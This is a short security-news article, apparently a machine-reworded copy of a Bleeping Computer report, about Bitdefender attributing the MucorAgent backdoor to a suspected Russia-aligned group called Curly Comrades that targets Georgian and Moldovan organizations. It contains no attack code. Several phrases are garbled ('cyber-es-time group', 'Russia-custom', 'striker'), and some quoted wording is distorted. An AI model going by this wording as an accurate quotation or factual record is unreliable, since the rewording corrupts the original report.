- BitDefender finds new piece of malware in nature
- It attributed to a brand new cyber-es-time group
- The researchers believe the group is Russian
CyberSecurity researchers at Bitdefender recently discovered a new threat actor using a never-seen piece of back door malware to target critical infrastructure organizations in Eastern Europe.
Bitdefender appointed the new group of Curly Comrades as it strongly depends on the Curl.exe tool to pull data and communicate with the C2 server and as it hijacks component object (com) objects under its attack.
In its attacks, Curly Comrades implements a back door named Mucoragent, a custom three-step malware component, “constructed as a .net-stealthy tool capable of performing an AES encrypted PowerShell script and uploading the resulting output to a particular server.”
In doubt – blame the Russians
In other words, it is a piece of Windows Malware running hidden commands, keeping them encrypted to avoid detection and send the results back to the striker.
So far, identified victims include government and justice organizations in Georgia and energy companies in Moldova.
Given the goals, researchers believe that attackers are of Russian origin or at least Russia-custom.
However, they emphasized that there are no strong overlaps with known Russian APT groups, but Curly Comrades’ operations “Customize with the geopolitical targets of the Russian Federation.”
BitDefender also couldn’t determine the initial access vector – how Crooks managed to infiltrate the target endpoints to insert mucor agent to begin with.
They claim to have seen installations of several proxy agents, including resocks that they suspect may have been used for that purpose.
Ever since Russia’s attention turned to Ukraine in 2014 with the annexation of Crimea, countries on its eastern border have lost the limelight. However, Georgia is in a similar position as Ukraine, with two regions declaring independence using the Russian military – South Ossetia and Abkhazia. Therefore, it would make sense that Russia’s cyberspier would like to keep an eye on neighboring countries and their diplomatic efforts.
Via Bleeping computer
